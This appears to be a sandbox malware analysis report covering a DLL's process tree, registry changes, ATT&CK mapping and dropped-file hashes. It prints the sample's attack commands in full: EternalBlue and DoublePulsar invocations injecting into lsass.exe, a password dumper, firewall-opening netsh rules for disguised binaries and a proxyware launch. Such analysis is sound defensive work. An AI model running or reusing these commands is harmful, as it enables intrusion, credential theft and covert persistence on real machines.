Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{646ADAD8-DAC8-41BE-8335-8C0366E934AA}	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-571 = "China Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-152 = "Central America Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{646ADAD8-DAC8-41BE-8335-8C0366E934AA}\WpadNetworkName = "Network 3"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time"	Meson.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
2784	MpMgSvc.exe
2784	MpMgSvc.exe
2784	MpMgSvc.exe
2784	MpMgSvc.exe
2784	MpMgSvc.exe
2784	MpMgSvc.exe
2784	MpMgSvc.exe
2784	MpMgSvc.exe
2784	MpMgSvc.exe
5552	GetPassword.exe
5552	GetPassword.exe
5552	GetPassword.exe
5332	powershell.exe
948	svchost.exe
948	svchost.exe
948	svchost.exe
948	svchost.exe
948	svchost.exe
948	svchost.exe
948	svchost.exe
948	svchost.exe
948	svchost.exe
948	svchost.exe
948	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
6204	svchost.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5552	GetPassword.exe
Token: SeDebugPrivilege	5332	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2784	MpMgSvc.exe
2784	MpMgSvc.exe
564	Wmicc.exe
2936	Hooks.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1680 wrote to memory of 2808	1680	rundll32.exe	30
PID 1680 wrote to memory of 2808	1680	rundll32.exe	30
PID 1680 wrote to memory of 2808	1680	rundll32.exe	30
PID 1680 wrote to memory of 2808	1680	rundll32.exe	30
PID 1680 wrote to memory of 2808	1680	rundll32.exe	30
PID 1680 wrote to memory of 2808	1680	rundll32.exe	30
PID 1680 wrote to memory of 2808	1680	rundll32.exe	30
PID 1680 wrote to memory of 2808	1680	rundll32.exe	30
PID 1680 wrote to memory of 2808	1680	rundll32.exe	30
PID 2808 wrote to memory of 2784	2808	svchost.exe	32
PID 2808 wrote to memory of 2784	2808	svchost.exe	32
PID 2808 wrote to memory of 2784	2808	svchost.exe	32
PID 2808 wrote to memory of 2784	2808	svchost.exe	32
PID 2784 wrote to memory of 6324	2784	MpMgSvc.exe	33
PID 2784 wrote to memory of 6324	2784	MpMgSvc.exe	33
PID 2784 wrote to memory of 6324	2784	MpMgSvc.exe	33
PID 2784 wrote to memory of 6324	2784	MpMgSvc.exe	33
PID 2784 wrote to memory of 9812	2784	MpMgSvc.exe	35
PID 2784 wrote to memory of 9812	2784	MpMgSvc.exe	35
PID 2784 wrote to memory of 9812	2784	MpMgSvc.exe	35
PID 2784 wrote to memory of 9812	2784	MpMgSvc.exe	35
PID 2784 wrote to memory of 564	2784	MpMgSvc.exe	38
PID 2784 wrote to memory of 564	2784	MpMgSvc.exe	38
PID 2784 wrote to memory of 564	2784	MpMgSvc.exe	38
PID 2784 wrote to memory of 564	2784	MpMgSvc.exe	38
PID 564 wrote to memory of 700	564	Wmicc.exe	39
PID 564 wrote to memory of 700	564	Wmicc.exe	39
PID 564 wrote to memory of 700	564	Wmicc.exe	39
PID 564 wrote to memory of 700	564	Wmicc.exe	39
PID 700 wrote to memory of 5552	700	cmd.exe	41
PID 700 wrote to memory of 5552	700	cmd.exe	41
PID 700 wrote to memory of 5552	700	cmd.exe	41
PID 700 wrote to memory of 5552	700	cmd.exe	41
PID 2808 wrote to memory of 2936	2808	svchost.exe	42
PID 2808 wrote to memory of 2936	2808	svchost.exe	42
PID 2808 wrote to memory of 2936	2808	svchost.exe	42
PID 2808 wrote to memory of 2936	2808	svchost.exe	42
PID 2936 wrote to memory of 5332	2936	Hooks.exe	44
PID 2936 wrote to memory of 5332	2936	Hooks.exe	44
PID 2936 wrote to memory of 5332	2936	Hooks.exe	44
PID 2936 wrote to memory of 5332	2936	Hooks.exe	44
PID 948 wrote to memory of 6204	948	svchost.exe	46
PID 948 wrote to memory of 6204	948	svchost.exe	46
PID 948 wrote to memory of 6204	948	svchost.exe	46
PID 948 wrote to memory of 6204	948	svchost.exe	46
PID 948 wrote to memory of 6204	948	svchost.exe	46
PID 948 wrote to memory of 6204	948	svchost.exe	46
PID 948 wrote to memory of 6204	948	svchost.exe	46
PID 948 wrote to memory of 6204	948	svchost.exe	46
PID 948 wrote to memory of 6204	948	svchost.exe	46
PID 948 wrote to memory of 6328	948	svchost.exe	47
PID 948 wrote to memory of 6328	948	svchost.exe	47
PID 948 wrote to memory of 6328	948	svchost.exe	47
PID 948 wrote to memory of 6328	948	svchost.exe	47
PID 948 wrote to memory of 10012	948	svchost.exe	49
PID 948 wrote to memory of 10012	948	svchost.exe	49
PID 948 wrote to memory of 10012	948	svchost.exe	49
PID 948 wrote to memory of 10012	948	svchost.exe	49
PID 948 wrote to memory of 9724	948	svchost.exe	51
PID 948 wrote to memory of 9724	948	svchost.exe	51
PID 948 wrote to memory of 9724	948	svchost.exe	51
PID 948 wrote to memory of 9724	948	svchost.exe	51
PID 948 wrote to memory of 9520	948	svchost.exe	53
PID 948 wrote to memory of 9520	948	svchost.exe	53

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\947897f1318cd1e03417c2e4699ac14c2d8b2e4fd7e51a5044fc2d5f8257e738.dll,#1
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1680
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\SysWOW64\svchost.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2808
- - C:\WINDOWS\Temp\MpMgSvc.exe
    "C:\WINDOWS\Temp\MpMgSvc.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2784
  - - C:\WINDOWS\Temp\Eternalblue-2.2.0.exe
      Eternalblue-2.2.0.exe --TargetIp 10.127.0.123 --Target WIN72K8R2 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:6324
  - - C:\WINDOWS\Temp\Eternalblue-2.2.0.exe
      Eternalblue-2.2.0.exe --TargetIp 10.127.0.123 --Target WIN72K8R2 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:9812
  - - C:\Windows\Temp\Wmicc.exe
      "C:\Windows\Temp\Wmicc.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:564
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c C:\Windows\Temp\GetPassword.exe >C:\Windows\Temp\PWD.txt
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:700
      - C:\Windows\Temp\GetPassword.exe
        
        C:\Windows\Temp\GetPassword.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5552
  - - C:\WINDOWS\Temp\Doublepulsar-1.3.1.exe
      Doublepulsar-1.3.1.exe --OutConfig LOG.txt --TargetIp 10.127.0.123 --TargetPort 445 --DllPayload x64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:8388
  - - C:\WINDOWS\Temp\Doublepulsar-1.3.1.exe
      Doublepulsar-1.3.1.exe --OutConfig LOG.txt --TargetIp 10.127.0.123 --TargetPort 445 --DllPayload x64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1612
- - C:\WINDOWS\Temp\Hooks.exe
    "C:\WINDOWS\Temp\Hooks.exe"
    3⤵
    - Server Software Component: Terminal Services DLL
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2936
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Sleep -s 2;del "C:\WINDOWS\Temp\Hooks.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5332

C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k GraphicsPerfSvcsGroup
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:948
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\system32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  PID:6204
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_ctfmoon dir=in program=C:\Windows\Microsoft.NET\ctfmoon.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:6328
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_ctfmoon dir=out program=C:\Windows\Microsoft.NET\ctfmoon.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:10012
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall set rule name=Microsoft_ctfmoon new enable=yes
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:9724
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_Edge dir=in program=C:\Windows\Microsoft.NET\Meson.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:9520
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_Edge dir=out program=C:\Windows\Microsoft.NET\Meson.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:9364
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall set rule name=Microsoft_Edge new enable=yes
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5544
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_Dcom dir=in program=C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5812
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_Dcom dir=out program=C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:9132
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall set rule name=Microsoft_Dcom new enable=yes
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:8932
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_Store dir=in program=C:\WINDOWS\Microsoft.Net\Framework\v3.0\WmiPrvSER.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:8796
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_Store dir=out program=C:\WINDOWS\Microsoft.Net\Framework\v3.0\WmiPrvSER.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:8536
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall set rule name=Microsoft_Store new enable=yes
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:8360
- C:\Windows\Microsoft.NET\ctfmoon.exe
  C:\Windows\Microsoft.NET\ctfmoon.exe [email protected] -password=123456Aa. -device-name=Win32 -accept-tos
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2532
- C:\Windows\Microsoft.NET\Meson.exe
  C:\Windows\Microsoft.NET\Meson.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:2292
- C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe
  C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe
  2⤵
  PID:9848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Network Service Discovery

T1046

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\Microsoft.NET\Meson.exe

Filesize
8.9MB

MD5
87c8b215c031443d630da6c18088f89a

SHA1
7a17a9026ec093c4571c13c2fc128b27fbd66a11

SHA256
0caedcf61c3bfe2da33b30adf2f5f2c1530b6907f133f4289519a56cc5c1bae6

SHA512
48d5565f5da60371b79d2c380a63c7b416a220ae7f52656ba4ed9447cf55ab73a05c4165c61c2a95c4e586b2baf483b0b97dcff77c76cadfe039690ded35c43e

Download Submit
C:\Windows\Microsoft.NET\ctfmoon.exe

Filesize
9.1MB

MD5
1de26ef85f7218e1df4ed675fa2b05d4

SHA1
e5217fa3b50f625d84d5e5c4b66c031f7a2446ae

SHA256
fdd762192d351cea051c0170840f1d8d171f334f06313a17eba97cacb5f1e6e1

SHA512
ada80a9f97bec76899eccc40c646387a067a201663d4d0f4537af450ea7c92df877f017862634e32e9e2ba08ca6d41806dc03f0dfd7f811ca303b56b1ac17d92

Download Submit
C:\Windows\Temp\Doublepulsar-1.3.1.exe

Filesize
44KB

MD5
c24315b0585b852110977dacafe6c8c1

SHA1
be855cd1bfc1e1446a3390c693f29e2a3007c04e

SHA256
15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13

SHA512
81032d741767e868ec9d01e827b1c974b7c040ff832907d0a2c4bdc08301189b1de3338225587eddf81a829103392f454ba9d9685330b5f6706ea2977a6418e2

Download Submit
C:\Windows\Temp\Eternalblue-2.2.0.xml

Filesize
7KB

MD5
497080fed2000e8b49ee2e97e54036b1

SHA1
4af3fae881a80355dd09df6e736203c30c4faac5

SHA256
756f44f1d667132b043bfd3da16b91c9f6681e5d778c5f07bb031d62ff00d380

SHA512
4f8bd09f9d8d332c436beb8164eec90b0e260b69230f102565298beff0db37265be1ae5eb70acf60e77d5589c61c7ee7f01a02d2a30ac72d794a04efef6f25df

Download Submit
C:\Windows\Temp\GetPassword.exe

Filesize
494KB

MD5
5b6a804db0c5733d331eb126048ca73b

SHA1
f18c5acae63457ad26565d663467fa5a7fbfbee4

SHA256
5bec6b3bc6f8cbda50a8c5195a488cc82d2e00f18ec75640db31b2376a6db9f9

SHA512
ba6424051ab9f650967cc2ba428fd6a02ccda8f99d8b8e3f5f321a5e6bbf79a22bfc9cdd582c44980470ebbb7aea1b811fd69aab6bf51466a803c7c722fcde26

Download Submit
C:\Windows\Temp\Hooks.exe

Filesize
11.7MB

MD5
1af2da7b95cdbbd5a18461e5d5fe910a

SHA1
8540958b02170962cb958da094e059be5ff43fb0

SHA256
1b08b6f863be2c62eb5b00457475630fddb245361f1a35e4396eada29e2da64a

SHA512
bc3ea6b76cc8079871c550af197d01c227526688881b10a5192a215d9dca8cd8401408d6a6835444cab862b20856b1ad88b1450a3f93dfa8cd2ecbdc5653459a

Download Submit
C:\Windows\Temp\MpMgSvc.exe

Filesize
3.2MB

MD5
3809c59565787ee7398fe9222d4bd669

SHA1
68842768c9ae9deb1d1d7ed2b27846c392b47103

SHA256
c751d97251cd67604c0256b779fabac87d4ed2d647ce0d830e2a1670cd3616c6

SHA512
2f78ad26acfe15f4682b69090704fa8ebb24938c8a58b8d343ef0993e8234897aed53dfcea4119168f915384fe545d2cbb16bc12339d0600dafae06deefc9098

Download Submit
C:\Windows\Temp\PWD.txt

Filesize
29B

MD5
f6262ef1583c2ff55e4d5c88fdb93a9d

SHA1
b1b3f25f1296d2a27a9f13711e756ce1bd18524c

SHA256
e7df16b8cee14c69a079ecd3b7957ca3bf362fa7a0f89eee6c16ec6305ac9fbe

SHA512
dc8f97cf9d542623a6b651e493a065da2d24f93d285dc152b43719708c2231f83ded09d8064dae826200a6de13c650f70bbd94cc1c7943b9886bb0938b33b034

Download Submit
C:\Windows\Temp\ip.txt

Filesize
180KB

MD5
c66c3b3bffc02ef8eb1e0840275b2243

SHA1
9e999ac7f977fd54cb104a4bbe800e7c56be9ca1

SHA256
4842fe20bb1746ee61be52bf7ab03e2ac1c773069040f3f0d3700053c0463287

SHA512
553f16bad1275868b47d23ff76b13b953a5bf68c3eebd6d23bb8b3c2acb2748db6bf55b1c10b58760098e177512dcaa04f878bbc6c26ead3af75ac8237c5b0de

Download Submit
C:\Windows\Temp\ip.txt

Filesize
4KB

MD5
a70f8622fed92bca258a2fb923d67451

SHA1
756541646c6cae5a574886a4ac92ba7688e9a6a3

SHA256
bdcd08e9a540fcd7f81e9ff1c016de991df02173764b2453638247a1181608e3

SHA512
951659c62a8e94cbb665975a05086384b3f67e7282dfa44cfdc7f75edbf0e5093a88ad6d633a7d33b9bd551621ddb9eca95b4607f77e3442bcfd3e542841299c

Download Submit
\??\c:\users\admin\appdata\roaming\graphicsperfsvcs.dll

Filesize
23.7MB

MD5
effda8dc24b5465dd1424177160a5f1a

SHA1
9c3267d98ec841d4debda61d7c6aa158e6750996

SHA256
2bfbf9d0ed537106096a2dbfdb4bc1bbc1818c8d5befbad46fe872dfb2e5ee0b

SHA512
98e4155193e06baaec900d423eee3069809dbe5d26d401ce4508b79e4874b9014c3d6a8f36416074a369e17b089cd081820c01dc6cdd6743ece01e2ac182ac79

Download Submit
\Windows\Temp\Eternalblue-2.2.0.exe

Filesize
126KB

MD5
8c80dd97c37525927c1e549cb59bcbf3

SHA1
4e80fa7d98c8e87facecdef0fc7de0d957d809e1

SHA256
85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5

SHA512
50e9a3b950bbd56ff9654f9c2758721b181e7891384fb37e4836cf78422399a07e6b0bfab16350e35eb2a13c4d07b5ce8d4192fd864fb9aaa9602c7978d2d35e

Download Submit
\Windows\Temp\Wmicc.exe

Filesize
1.4MB

MD5
4935b75f2a23d38527cf3821c9d9dac3

SHA1
f17aa56215ab7b90da00f048fe30d39a2d671b5d

SHA256
dd2d7b07e9091590ae60b42022956319bbbbd51b457ea214fb475ecc3e9156f8

SHA512
348e041104de20b0850b19db1ebb88ae0b65ecd1695f1ade47e099d62da9cec983a1a73e7fc657509b4fc58496784e0c1681bf46265477b75fdfab440c41acbd

Download Submit
\Windows\Temp\cnli-1.dll

Filesize
98KB

MD5
a539d27f33ef16e52430d3d2e92e9d5c

SHA1
f6d4f160705dc5a8a028baca75b2601574925ac5

SHA256
db0831e19a4e3a736ea7498dadc2d6702342f75fd8f7fbae1894ee2e9738c2b4

SHA512
971c7d95f49f9e1ae636d96f53052cfc3dbdb734b4a3d386346bf03ca78d793eaee18efcae2574b88fdee5633270a24db6c61aa0e170bcc6d11750dbd79ad0af

Download Submit
\Windows\Temp\coli-0.dll

Filesize
15KB

MD5
3c2fe2dbdf09cfa869344fdb53307cb2

SHA1
b67a8475e6076a24066b7cb6b36d307244bb741f

SHA256
0439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887

SHA512
d6b819643108446b1739cbcb8d5c87e05875d7c1989d03975575c7d808f715ddcce94480860828210970cec8b775c14ee955f99bd6e16f9a32b1d5dafd82dc8c

Download Submit
\Windows\Temp\exma-1.dll

Filesize
10KB

MD5
ba629216db6cf7c0c720054b0c9a13f3

SHA1
37bb800b2bb812d4430e2510f14b5b717099abaa

SHA256
15292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9

SHA512
c4f116701798f210d347726680419fd85880a8dc12bf78075be6b655f056a17e0a940b28bbc9a5a78fac99e3bb99003240948ed878d75b848854d1f9e5768ec9

Download Submit
\Windows\Temp\libxml2.dll

Filesize
807KB

MD5
9a5cec05e9c158cbc51cdc972693363d

SHA1
ca4d1bb44c64a85871944f3913ca6ccddfa2dc04

SHA256
aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3

SHA512
8af997c3095d728fe95eeedfec23b5d4a9f2ea0a8945f8c136cda3128c17acb0a6e45345637cf1d7a5836aaa83641016c50dbb59461a5a3fb7b302c2c60dfc94

Download Submit
\Windows\Temp\posh-0.dll

Filesize
11KB

MD5
2f0a52ce4f445c6e656ecebbcaceade5

SHA1
35493e06b0b2cdab2211c0fc02286f45d5e2606d

SHA256
cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb

SHA512
88151ce5c89c96c4bb086d188f044fa2d66d64d0811e622f35dceaadfa2c7c7c084dd8afb5f774e8ad93ca2475cc3cba60ba36818b5cfb4a472fc9ceef1b9da1

Download Submit
\Windows\Temp\tibe-2.dll

Filesize
232KB

MD5
f0881d5a7f75389deba3eff3f4df09ac

SHA1
8404f2776fa8f7f8eaffb7a1859c19b0817b147a

SHA256
ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362

SHA512
f266baecae0840c365fe537289a8bf05323d048ef3451ebffbe75129719c1856022b4bddd225b85b6661bbe4b2c7ac336aa9efdeb26a91a0be08c66a9e3fe97e

Download Submit
\Windows\Temp\trch-1.dll

Filesize
58KB

MD5
838ceb02081ac27de43da56bec20fc76

SHA1
972ab587cdb63c8263eb977f10977fd7d27ecf7b

SHA256
0259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f

SHA512
bcca9e1e2f84929bf513f26cc2a7dc91f066e775ef1d34b0fb00a54c8521de55ef8c81f796c7970d5237cdeab4572dedfd2b138d21183cb19d2225bdb0362a22

Download Submit
\Windows\Temp\trfo-2.dll

Filesize
29KB

MD5
3e89c56056e5525bf4d9e52b28fbbca7

SHA1
08f93ab25190a44c4e29bee5e8aacecc90dab80c

SHA256
b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa

SHA512
32487c6bca48a989d48fa7b362381fadd0209fdcc8e837f2008f16c4b52ab4830942b2e0aa1fb18dbec7fce189bb9a6d40f362a6c2b4f44649bd98557ecddbb6

Download Submit
\Windows\Temp\tucl-1.dll

Filesize
9KB

MD5
83076104ae977d850d1e015704e5730a

SHA1
776e7079734bc4817e3af0049f42524404a55310

SHA256
cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12

SHA512
bd1e6c99308c128a07fbb0c05e3a09dbcf4cec91326148439210077d09992ebf25403f6656a49d79ad2151c2e61e6532108fed12727c41103df3d7a2b1ba82f8

Download Submit
\Windows\Temp\ucl.dll

Filesize
57KB

MD5
6b7276e4aa7a1e50735d2f6923b40de4

SHA1
db8603ac6cac7eb3690f67af7b8d081aa9ce3075

SHA256
f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a

SHA512
58e65ce3a5bcb65f056856cfda06462d3fbce4d625a76526107977fd7a44d93cfc16de5f9952b8fcff7049a7556b0d35de0aa02de736f0daeec1e41d02a20daa

Download Submit
\Windows\Temp\xdvl-0.dll

Filesize
31KB

MD5
5b72ccfa122e403919a613785779af49

SHA1
f560ea0a109772be2b62c539b0bb67c46279abd1

SHA256
b7d8fcc3fb533e5e0069e00bc5a68551479e54a990bb1b658e1bd092c0507d68

SHA512
6d5e0fef137c9255244641df39d78d1180172c004882d23cf59e8f846726021ba18af12deb0e60dfe385f34d7fb42ae2b5e54915ffa11c42d214b4fbfad9f39d

Download Submit
memory/1612-13798-0x0000000000DE0000-0x0000000000EC3000-memory.dmp

Filesize
908KB

Download
memory/1612-13794-0x0000000000D10000-0x0000000000DDE000-memory.dmp

Filesize
824KB

Download
